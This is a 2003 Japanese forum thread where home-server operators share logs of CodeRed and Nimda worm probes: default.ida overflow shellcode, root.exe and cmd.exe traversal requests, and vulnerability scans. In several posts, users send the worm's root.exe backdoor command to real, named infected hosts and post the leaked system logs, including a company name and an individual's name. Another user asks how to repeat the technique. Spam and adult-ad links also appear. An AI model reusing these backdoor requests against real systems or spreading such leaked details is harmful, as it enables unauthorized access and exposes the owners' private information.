この鯖ワームにやられてます

[0001 DNS未登録さん 03/02/08 17:15 ID:???]

自宅で鯖も善いけど、管理はちゃんとしようよ。
ログを汚すだけではなく、ネットワーク資源のムダ使いの
CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!!

管理者がこの板みて、対処を期待する。

[0101 DNS未登録さん 03/04/15 19:33 ID:???]

これが、この板の現実でしょ。悲しいけど。

[0102 DNS未登録さん 03/04/16 11:38 ID:???]

CodeRedが大量に来てますね．．．
　⇒219.156.232.21
　　219.237.77.95
　　219.181.154.52
　　219.140.211.162
　　12.235.16.127

あと、ガーラって調査会社のロボット検索もウザイ
　⇒211.4.250.133

[0103 DNS未登録さん 03/04/16 15:34 ID:???]

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

NetRange: 219.0.0.0 - 219.255.255.255
CIDR: 219.0.0.0/8
NetName: APNIC5
NetHandle: NET-219-0-0-0-1

[0104 DNS未登録さん 03/04/16 15:35 ID:???]

OrgName: AT&T WorldNet Services
OrgID: ATTW
Address: 400 Interpace Parkway
City: Parsippany
StateProv: NJ
PostalCode: 07054
Country: US

NetRange: 12.0.0.0 - 12.255.255.255
CIDR: 12.0.0.0/8
NetName: ATT
NetHandle: NET-12-0-0-0-1

[0105 DNS未登録さん 03/04/16 15:37 ID:???]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.4.250.0
b. [ネットワーク名] I2TS-NET
f. [組織名] 株式会社イーツ
g. [Organization] I2ts Inc.,
m. [運用責任者] MK5986JP
n. [技術連絡担当者] HI1771JP
n. [技術連絡担当者] MK5986JP

>>102
ってなってるけど、がーらって会社なの？

[0106 DNS未登録さん 03/04/16 17:55 ID:???]

>>105
ﾈﾀですか？(w

[0107 DNS未登録さん 03/04/16 20:24 ID:???]

>>105
nslookupで逆引きすると、gala-net.co.jpという
ドメインが出てきます。何の会社かと思って
ホームページを見たら、ネット上の書き込みを
自動巡回してチェックするサービスを提供していました。

最近、フレッシュアイのロボット検索が定期的に
来るようになって、フレッシュアイにも情報が
登録されたんですが、それをガーラのロボットが
検出して、探りを入れに来ているようです。

[0108 山崎渉 03/04/17 12:00 ID:???]

（＾＾）

[0109 DNS未登録さん 03/04/18 23:31 ID:9c62ManQ]

YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178

220.13.168.112うざすぎ。
YBBにメールして遮断できないものだろうか…

[0110 DNS未登録さん 03/04/19 01:06 ID:???]

>>109
ごめん

[0111 DNS未登録さん 03/04/19 01:07 ID:???]

>>100
来ている来ていないの問題じゃなくて(ry

[0112 DNS未登録さん 03/04/19 09:15 ID:???]

>>109
YBBならIP変わらないみたいだから、アクセス制限リストに
放り込んで置けば宜しいかと。まあ、それでも鬱陶しい
事に変わりは無いけど。

[0113 DNS未登録さん 03/04/19 22:57 ID:???]

>>109
入り込んで止めてあげたら？（ｗ

[0114 山崎渉 03/04/20 05:53 ID:???]

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

[0115 : 03/04/21 18:07 ID:j62Px7e4]

☆^〜^★　50音順で探せて楽して得する
http://sagatoku.fc2web.com/
　　　あなたの探し物きっとみつかるよ☆^〜^★

[0116 DNS未登録さん 03/04/22 04:26 ID:???]

>>113
それってCodeGreen…w

[0117 DNS未登録さん 03/04/30 19:11 ID:???]

最近こんなのが来てる。

202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-"
202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-"

[0118 初心者 03/04/30 21:09 ID:???]

当方やふーｂｂですが、
昨日Anhttpdで適当にweb鯖を立てて放置したところ
いろいろ釣れました。

なんですかコリャ？
相手もやふーｂｂのようで。。
感染したワームが、一体何をしようとしているのだかよく分からんが
xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか？
一日中こんなの送ってきて動作が重くなったりしないんだろか

219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u
8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215

[0119 初心者 03/04/30 21:14 ID:???]

って最初の219.144.82.204は中国の鯖っぽいな。
アクセスしようとしたら漢字だらけの404が返ってきた。

やふーbbの方はアホなユーザーがワームに感染していることも知らず
繋ぎっ放しにしているのかなぁ･･･

[0120 DNS未登録さん 03/04/30 21:14 ID:???]

飽きるほど見たNimdaだな。

[0121 DNS未登録さん 03/04/30 21:28 ID:???]

感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。

[0122 DNS未登録さん 03/05/01 00:23 ID:???]

つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・

[0123 119 03/05/01 00:56 ID:???]

>>122
すんマソ。良く見たら
殆んど同じような報告がいくつも書かれていた…。

初心者なので変なのが飛んできたことが嬉しくて
ついつい書いてしまったのでつた。

[0124 119 03/05/01 01:05 ID:???]

こう言うワームの類って、
鯖にセキュリティーホールが無ければ直接害は無いんだよね？

しかし大量に飛んでくると
ログ作成するのに負荷が掛かるってのがあるか…

ルーターでワームだけをカットするような設定は、
簡単には出来るんかなぁ

IP指定するのは当然出来るが
こうあちこちから飛んでくると切りが無い。

[0125 DNS未登録さん 03/05/02 11:05 ID:???]

だから、IP弾きは自動化できないって・・・

つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら
教えてもらいたい・・・

なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると
困る可能性がある。

困ったときには、どこのブラックリストの一部が困ったのかわからないので
ブラックリスト自体を消す羽目になる。

以上無理。

[0126 DNS未登録さん 03/05/02 22:29 ID:???]

IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する
ハードウェアルータがあったら良いのにな
もちろん検出パターンはメーカーからの自動更新で。

[0127 DNS未登録さん 03/05/02 23:18 ID:???]

>>118
219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁

http://219.180.88.36/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

[0128 DNS未登録さん 03/05/03 00:31 ID:???]

>>127
> Windows 2000 Version: 5.0
> 現在のビルド: 2195
> Service Pack: None
> 現在のタイプ: Uniprocessor Free
> 登録されている会社名: （・∀・）
> 登録されている所有者: （・∀・）

禿げ藁
常時接続のくせにServicePackも当てとらんとは、
もしや、ワレザーだったりしてな。

今頃Winnyでエロ画像落としてﾊｧﾊｧしてるんだろ

[0129 DNS未登録さん 03/05/03 02:47 ID:???]

MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。
tptp.exeが大活躍していたりはするけどw
2ちゃんねらーにしては激しくツマンナイ椰子やね。



こういうのが糞スレ立てるんだろうな。

[0130 129 03/05/03 02:49 ID:???]

tftp.exeの間違い(欝氏

[0131 DNS未登録さん 03/05/03 11:11 ID:OG87RHjs]

WHOISでみるかぎりコリアみたいですねー
210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

これはチャイナ
210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

[0132 DNS未登録さん 03/05/03 12:20 ID:8w0u+xU1]

とりあえず、今日だけの分でも素のIPを晒します。
211.153.19.148
211.180.229.213
211.114.27.16
211.249.78.151
211.116.251.18
上から順に新しい
全てCoderedに感染。しかも日本のIPかな？よく分からん。

[0133 DNS未登録さん 03/05/03 12:23 ID:8w0u+xU1]

って調べたら、前のとあわせて全部国はオーストラリアじゃん!!

[0134 DNS未登録さん 03/05/03 12:26 ID:7iA2vytO]

http://www13.big.or.jp/~fubuki/chat/chat2.html
荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。
これと同じヤツをいろんなヤツにコピペしてね

[0135 DNS未登録さん 03/05/03 13:27 ID:???]

>>133
馬鹿は whois を使うな。

[0136 DNS未登録さん 03/05/03 20:46 ID:???]

>>126
IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。
NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、
スループットが低いので、光ユーザーだと勿体無い。
http://www.trendmicro.com/jp/products/desktop/gatelock/evaluate/overview.htm

>>127
>>128
>>129
不味くないか？

[0137 DNS未登録さん 03/05/04 01:25 ID:???]

>>127-129
通報しますた！

と、言いたい所だが不正アクセス等を
相手は全く理解していない予感…

[0138 03/05/08 14:27 ID:???]

少なくともこれらのリクエスト送ってくるヤツらは
MSのIISを立ち上げてる、と考えていいのですか？

202.125.153.14
61.187.64.194
202.39.15.237
202.131.151.20
202.194.196.67

これらはホスト名逆引きできないんですが、どういうことでしょうか。

[0139 138 03/05/08 14:29 ID:???]

ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。

[0140 DNS未登録さん 03/05/08 16:36 ID:???]

>>138
> これらはホスト名逆引きできないんですが、どういうことでしょうか。
ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net)
>>139
> ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。
赤帽と窓のデュアルブート環境だから。

[0141 DNS未登録さん 03/05/08 16:41 ID:???]

ｷｬﾘｱ

[0142 03/05/10 04:49 ID:???]

赤帽と窓のデュアルブート環境だから。

意味が分からない、apacheが立ち上がってるのに
なぜIISに感染するcode redが動いてるの？
Linuxが動いてるはずなのに。

[0143 DNS未登録さん 03/05/10 11:09 ID:???]

再接続でアドレスが変わったんじゃなーの？
んで、たまたま新たに割り振られた先に赤帽＆apacheがあったとか。

[0144 演@ usen-43x233x52x230.ap-USEN.usen.ad.jp 03/05/10 11:44 ID:???]

>>142
Win32版＆IISだったとか（Linuxの根拠は。

[0145 DNS未登録さん 03/05/10 14:08 ID:???]

>144
実際にアクセスしてみてヘッダを見てからの発言だろーな？

[0146 演@ usen-43x233x52x230.ap-USEN.usen.ad.jp 03/05/10 18:43 ID:???]

>>146
ルータの下でポートフォワードで複数動かしてるとか。

[0147 DNS未登録さん 03/05/10 19:51 ID:???]

自問自答ですか？

[0148 DNS未登録さん 03/05/11 02:29 ID:???]

ログの中にこんなの発見した
218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET http://www.21cn.net/ HTTP/1.1" 200 1529

何？

[0149 03/05/11 03:27 ID:???]

というか、不毛にIIS動かしてるバカ多すぎ。
トラフィックの無駄遣いも甚だしい。
どうせ何のサービスかわかってないような輩だろ。
NT系、デフォルトでIISなんて入ってないはずなのに
なんで動いてるんだ。取り敢えず腹が立つ。

[0150 DNS未登録さん 03/05/11 03:59 ID:???]

202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-"

http://202.196.110.208/

チョン国の中学校の鯖が感染しております。
なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん（T_T）

>>128のような情報を引っ張るにはどうしたらいいの？
http://IPアドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
ってリクエストすればいいの？404なったけど。

[0151 DNS未登録さん 03/05/11 10:37 ID:M3fadPgI]

http://bizinfo.cool.ne.jp/biz-rank/ranklink.cgi?id=mercury

[0152 DNS未登録さん 03/05/11 13:26 ID:x4ndWFzf]

＞貴方感染

もしかしたら、なんとなく程度だとしても意味が通じるかもしれない


＞鯖PC

これは絶対無理（藁

[0153 DNS未登録さん 03/05/11 13:29 ID:???]

>>150
英語で送っとけ
中国のエリートならペラペラだから

[0154 DNS未登録さん 03/05/11 14:10 ID:???]

そして、その中国のエリートが管理する鯖は穴だらけ。

[0155 ●かろりーたさん ◆JwU5Ac6TK2 03/05/11 14:56 ID:???]

>>148
http://www.21cn.net/
がそのＩＰアドレスにあると勘違い（？）して参照しようとしてきたリクエスト

[0156 DNS未登録さん 03/05/11 14:57 ID:???]

串

[0157 DNS未登録さん 03/05/11 15:21 ID:???]

>>149
漏れW2Kでサービスをいじってたら、
知らぬ間にIISが動作していたよ･･･

ANHTTPD起動しようとしたが
80番ポートが開いてないエラーが出るので調べていたら発覚した

そんな香具師が意外と多い予感

[0158 貴方感染 03/05/11 15:52 ID:???]

>貴方感染
我SARS否
とか、帰ってきそう(汗

>>149
>>157
そうなんですよね。
ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに
やり場のない怒りと、やるせなさと…

[0159 148 03/05/11 19:09 ID:???]

>>155
なるほど。
けどうちはttp://www.21cn.net/じゃないのになぜ200を返したんでしょうか？
cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。

[0160 DNS未登録さん 03/05/11 20:36 ID:???]

>>159
踏み台にして失敗したものです。
気になるようだったら、
SetEnvIf HOST FQDN allowed01
deny from env=!allowed01
にしとけば、403返すかと。

[0161 演@ usen-43x233x52x230.ap-USEN.usen.ad.jp 03/05/12 02:43 ID:???]

>>150
＞貴方感染
チョン環境っていうより大陸向けのような気もします。
半島って標準で和文や簡体、繁体フォント入ってるのかなあ。

マジレスすると普通に
Your environment is infected with the virus
and it is troubled. Please carry out somehow.
とかのほうが（文字コードだなんだ考えずに済んで）いいと思います。

[0162 148-159 03/05/12 13:50 ID:???]

>>160
あ、そうだったんですか。
うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。
教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。

「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り
HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ
ラーが返る。」とありましたので、httpd.confに設定してみました。

しばらくこれで様子を見てみます。ありがとうございました。
今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。
ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ
ックするぐらいしか出来ませんが、地道にやっていきます。

[0163 DNS未登録さん 03/05/13 01:52 ID:???]

64.110.110.240
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
（略）
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXﾖ090ﾖ858ﾖbd3ﾖ801ﾖ090ﾖ858ﾖbd3ﾖ801ﾖ090ﾖ858ﾖbd3ﾖ801ﾖ090ﾖ090ﾖ190ﾖ0c3ﾖ003ﾖb00ﾖ31bﾖ3ffﾖ078ﾖ000ﾖ0=a

ウガンダｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━━!!!!!

[0164 DNS未登録さん 03/05/15 09:44 ID:NUYgsRrd]

202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-"

最近多いのですが、このリクエストは何でしょうか？新手のワーム？

[0165 DNS未登録さん 03/05/15 21:13 ID:y3uNO88M]

219.218.95.81 - - [15/May/2003:17:46:54 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-"

[0166 _ 03/05/15 21:49 ID:???]

　 ∋8ノノハ.∩ 　
　　 川o・-・）ノ　＜先生！こんなのがありました！
http://www.hiroyuki.zansu.com/moe/hankaku07.html
http://hiroyuki.zansu.com/moe/hankaku10.html
http://www.hiroyuki.zansu.com/moe/hankaku08.html
http://hiroyuki.zansu.com/moe/hankaku09.html
http://www.hiroyuki.zansu.com/moe/hankaku06.html
http://hiroyuki.zansu.com/moe/hankaku05.html
http://www.hiroyuki.zansu.com/moe/hankaku01.html
http://hiroyuki.zansu.com/moe/hankaku02.html
http://www.hiroyuki.zansu.com/moe/hankaku03.html
http://hiroyuki.zansu.com/moe/hankaku04.html

[0167 ◆CfyWV6PsHI 03/05/16 00:12 ID:???]

ワーム対策にバーチャルホストはどうよ
HTTP_HOSTがない場合はダミーページの飛ばす

[0168 ◆CfyWV6PsHI 03/05/16 00:14 ID:???]

ログをバーチャルホスト毎に記録すれば
ワームのログは通常のログに混じらないが

[0169 山崎渉 03/05/22 01:54 ID:???]

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

[0170 DNS未登録さん 03/05/23 20:57 ID:???]

203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373

[0171 山崎渉 03/05/28 17:09 ID:???]

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

[0172 DNS未登録さん 03/05/29 00:01 ID:???]

初心者からの素朴な疑問

例えば、
c:/www/scripts/..ﾁ/winnt/system32/cmd.exe
にワームがアクセスしてくるとしますよね。

該当するディレクトリを作って、cmd.exeって名前のファイル（例えばフロッピーにアクセスし続けるファイルとか）置いといたらどうなるんでしょ？

[0173 DNS未登録さん 03/05/31 23:54 ID:9YFZ/gSa]

きのうの夕方に同一IPから5秒おきに20連発

"GET /NULL.IDA?CCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000
%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000
%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\
xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\
x90\x90\x90\x8b\xf7f\xb8H\x063 ...
<以下略、とても長い>

[0174 DNS未登録さん 03/06/01 07:30 ID:???]

>>173
それうちにも来た。
そのあとなんか意味不明な文字があってしかもログが改行されちゃう。
何なのそれ？

[0175 DNS未登録さん 03/06/01 13:04 ID:???]

>>174
http://pc2.2ch.net/test/read.cgi/mysv/1044200633/170

[0176 DNS未登録さん 03/06/10 00:05 ID:???]

久々にIRC繋いだら、こんなん帰ってきたのだが…
irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272

ワームチェックかなんかでしょうか？

[0177 03/06/14 03:18 ID:???]

http://yahoobb219055208068.bbtec.net/

バッチリ幹線してるようです。
[2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/
1 HTTP/1.1 200 OK
2 Server: Microsoft-IIS/5.0
3 Date: Fri, 13 Jun 2003 18:18:56 GMT
4 Connection: keep-alive
5 Connection: Keep-Alive
6 Content-Length: 1230
7 Content-Type: text/html
8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/
9 Cache-control: private
200 OK

どうやって警告したらいいでしょうか。

[0178 03/06/14 03:21 ID:???]

ftpとか開いてるし、アノニログインできるし(;´Д`)
厨房運営の鯖でしょうか。

Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
6699/tcp open napster

[0179 03/06/14 03:25 ID:???]

いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな？

htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

アプリケーション例外が発生しました:
アプリケーション: (pid=1020)
発生時間: 2003/05/01 @ 21:50:51.907
例外番号: c0000005 (アクセス違反)

*----> システム情報 <----*
コンピュータ名: VFGYARXITW27V4Y
ユーザー名: Administrator
プロセッサの数: 1
プロセッサの種類: x86 Family 6 Model 8 Stepping 6
Windows 2000 Version: 5.0
現在のビルド: 2195
Service Pack: None
現在のタイプ: Uniprocessor Free
登録されている会社名: 日本フレートライナー（株）
登録されている所有者: 山�ｱ勝行

[0180 DNS未登録さん 03/06/14 05:53 ID:???]

>>179
通報しますた。

[0181 DNS未登録さん 03/06/14 07:32 ID:CsSAkb5z]

ｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━!!!!
http://homepage3.nifty.com/coco-nut/

[0182 DNS未登録さん 03/06/14 10:32 ID:O9Qyx1v0]

これはもう警鐘モンだぞ。
パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。

212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX（rya

http://212.165.132.144/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

Application exception occurred:
App: (pid=1568)
When: 6/2/2003 @ 02:07:38.527
Exception number: c0000005 (access violation)

*----> System Information <----*
Computer Name: CISCO-ACS
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 8 Stepping 10
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: prestel
Registered Owner: okada

okadaって日本人か？

[0183 DNS未登録さん 03/06/14 12:11 ID:???]

(´-`).｡ｏＯ(不正にアクセスして個人情報開示してるバカだよなぁ・・・)

[0184 DNS未登録さん 03/06/14 12:25 ID:???]

日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような

[0185 DNS未登録さん 03/06/14 12:29 ID:???]

ややグレーゾーンに近いがな。
インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。

[0186 DNS未登録さん 03/06/14 22:35 ID:???]

わたしのホームページへアクセスした人は、不正アクセスでﾀｲｰﾎしてもらいます(w

[0187 DNS未登録さん 03/06/16 06:20 ID:???]

Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
は Code Green の物らしい。
ウイルスだった事には変わりは無いわけだが。

[0188 187 03/06/16 06:22 ID:???]

あ、その下の物の方が重要っぽい。失礼

[0189 DNS未登録さん 03/06/17 18:35 ID:???]

かぎの開いている家に侵入して情報ファイルを持ち出したら
そいつは窃盗罪だろう。

不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を
公開したりしてなにか損害が起きればけっこう痛いことになるかもね

[0190 DNS未登録さん 03/06/25 00:41 ID:???]

保守age

[0191 DNS未登録さん 03/06/25 18:58 ID:wfI9oVW0]

超過激ライブチャット登場！！！！！

あなたの命令で若い娘たちがヌレヌレモードへ

☆★アメリカ西海岸発☆★モザイクなし☆★

あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております！

ただいま、１０分間無料で体験できるほか７日間会費無料!!

http://www.gals-cafe.com

[0192 DNS未登録さん 03/06/27 23:41 ID:???]

＞＞190
喪前がageるから・・・

[0193 DNS未登録さん 03/07/03 03:00 ID:???]

6月分のcodered。
01/Jun/2003 30
02/Jun/2003 37
03/Jun/2003 24
04/Jun/2003 31
05/Jun/2003 30
06/Jun/2003 24
07/Jun/2003 24
08/Jun/2003 27
09/Jun/2003 31
10/Jun/2003 38
11/Jun/2003 30
12/Jun/2003 37
13/Jun/2003 40
14/Jun/2003 20
15/Jun/2003 25
16/Jun/2003 33
17/Jun/2003 27
18/Jun/2003 22
19/Jun/2003 21
20/Jun/2003 28
21/Jun/2003 24
22/Jun/2003 22
23/Jun/2003 27
24/Jun/2003 34
25/Jun/2003 26
26/Jun/2003 32
27/Jun/2003 33
28/Jun/2003 32
29/Jun/2003 24
30/Jun/2003 16

[0194 DNS未登録さん 03/07/05 03:27 ID:???]

これワーム関係？初めて見たんだけど
それともアタック？
2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-"
2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-"
2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-"
2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-"
2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
全67行

[0195 DNS未登録さん 03/07/05 04:45 ID:???]

アクセスしようとしてるファイル名から推測すると
IIS狙いのワームでないかい？

うちにはまだお見えになられてないです

[0196 DNS未登録さん 03/07/05 14:20 ID:???]

>>194
> 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"

cgiwrapの設定不備狙ってる？
IIS狙いとは言い切れない予感。

例の改ざん祭りの下準備かも((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

[0197 DNS未登録さん 03/07/05 17:11 ID:???]

＞196

祭りドコー？
